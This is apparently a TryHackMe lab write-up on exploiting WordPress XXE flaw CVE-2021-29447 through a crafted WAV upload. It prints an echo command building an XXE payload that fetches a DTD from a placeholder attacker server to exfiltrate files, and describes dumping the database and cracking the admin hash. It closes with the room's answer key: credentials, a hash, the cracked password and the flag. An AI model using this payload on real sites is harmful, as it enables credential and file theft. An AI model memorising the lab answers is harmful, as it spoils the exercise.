We covered a wordpress XXE vulnerability CVE-2021-29447 that allows for sensitive files disclosure and server-side request forgery (SSRF). We exploited this WordPress vulnerability by generating WAV payload and uploading it to the compromised WordPress website. This was part of TryHackMe WordPress: CVE-2021-29447 Room.

OSCP Study Notes

Splunk SIEM Full Course with Practical Scenarios

What is XXE vulnerability

An XML External Entity (XXE) attack is a vulnerability that abuses features of XML parsers/data. It often allows an attacker to interact with any backend or external systems that the application itself can access and can allow the attacker to read the file on that system. They can also cause Denial of Service (DoS) attack or could use XXE to perform Server-Side Request Forgery (SSRF) inducing the web application to make requests to other applications. XXE may even enable port scanning and lead to remote code execution.

WordPress CVE-2021-29447 Impact

  • Arbitrary File Disclosure: The contents of any file on the host’s file system could be retrieved, e.g. wp-config.php which contains sensitive data such as database credentials.
  • Server-Side Request Forgery (SSRF): HTTP requests could be made on behalf of the WordPress installation. Depending on the environment, this can have a serious impact.

Identifying the Vulnerability

The attacker uses WPScan to enumerate the WordPress installation and its plugins, discovering the WordPress version 5.6.2 which is vulnerable to CVE-2021-29447.The vulnerability specifically affects WordPress installations running PHP 8.

Exploiting the Vulnerability

After gaining low-privileged access to the WordPress admin panel, the attacker prepares an XML-based payload for the exploitation.The payload is crafted in a WAV file (payload.wav), which includes an XML external entity (XXE) to access the web server and retrieve sensitive data.

Creating The Payload

You can create a WAV payload using the the commands shown below

nano poc.wav
# create a wav file
echo -en 'RIFF\xb8\x00\x00\x00WAVEiXML\x7b\x00\x00\x00<?xml version="1.0"?><!DOCTYPE ANY[<!ENTITY % remote SYSTEM '"'"'http://YOURSEVERIP:PORT/NAMEEVIL.dtd'"'"'>%remote;%init;%trick;]>\x00' > payload.wav

# paste the payload using echo, change the ip and port to match yours

References

  • WordPress 5.7 – ‘Media Library’ XML External Entity Injection (XXE) (Authenticated): Exploit-DB
  • WordPress 5.6-5.7 – Authenticated (Author+) XXE (CVE-2021-29447): Github
  • WordPress 5.6-5.7 – Authenticated XXE Within the Media Library Affecting PHP 8: wpscan

Uploading the Payload

The attacker uploads the crafted payload.wav file to the WordPress media library. WordPress processes the XML file and requests a second file (proof_of_concept.dtd) from the attacker’s server. This second file triggers the SSRF attack, retrieving sensitive files like /etc/passwd.

A local web server is set up to host the second file (proof_of_concept.dtd) which the WordPress server fetches. The attacker monitors the web server logs to see when WordPress accesses the file and retrieves the data.

Retrieving and Decoding Data

The data returned by the WordPress server is Base64-encoded and zlib-compressed. The attacker uses a PHP script to decode the Base64 string and decompress the data, revealing sensitive information, such as the contents of wp-config.php.

Accessing the Database

Using the credentials retrieved from the wp-config.php file, the attacker logs into the MySQL database. They list the databases, select the WordPress database, and dump the contents of the wp_users table.The attacker’s goal is to retrieve the admin password hash and crack it to gain full administrative control over the WordPress site.

Cracking the Admin Hash

The password hash is cracked using a tool like John the Ripper, enabling the attacker to log in as the WordPress admin.

CVE-2021-29447 TryHackMe | Room Answers

Based on the results of #1, what is the name of the database for WordPress?

wordpressdb2

Based on the results of #1, what are the credentials you found?

example: user:password

thedarktangent:sUp3rS3cret132

Enumerate and identify what is the dbms installed on the server?

MySQL

Based on the results of #4, what is the dbms version installed on the server?

5.7.33

Based on the results of #4, what port is the dbms running on?

3306

Compromise the dbms, What is the encrypted password located in the wordpress  users table with id 1??

$P$B4fu6XVPkSU5KcKUsP1sD3Ul7G3oae1

Based on the results of #7, What is the password in plaint text?

teddybear

Compromise the machine and locate flag.txt

thm{28bd2a5b7e0586a6e94ea3e0adbd5f2f16085c72}

Video Walkthrough

About the Author

Mastermind Study Notes is a group of talented authors and writers who are experienced and well-versed across different fields. The group is led by, Motasem Hamdan, who is a Cybersecurity content creator and YouTuber.

View Articles